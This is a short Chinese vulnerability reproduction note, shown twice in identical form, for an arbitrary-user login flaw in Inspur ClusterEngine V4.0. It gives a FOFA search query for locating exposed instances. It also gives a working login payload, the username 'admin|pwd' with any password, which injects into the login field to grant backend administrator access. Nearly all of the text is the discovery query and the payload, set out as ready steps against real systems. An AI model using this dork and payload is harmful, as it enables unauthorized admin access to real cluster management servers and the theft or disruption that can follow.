1.漏洞描述
浪潮ClusterEngineV4.0 存在任意用户登录漏洞,构造恶意的用户名和密码即可获取后台权限。
2.资产查找
FOFA:title="TSCEV4.0"
3.漏洞复现
1)进入登录页面
2)输入用户名和密码如下,即可进入后台
USER: admin|pwd
PASS: 任意
点击登陆
1.漏洞描述
浪潮ClusterEngineV4.0 存在任意用户登录漏洞,构造恶意的用户名和密码即可获取后台权限。
2.资产查找
FOFA:title="TSCEV4.0"
3.漏洞复现
1)进入登录页面
2)输入用户名和密码如下,即可进入后台
USER: admin|pwd
PASS: 任意
点击登陆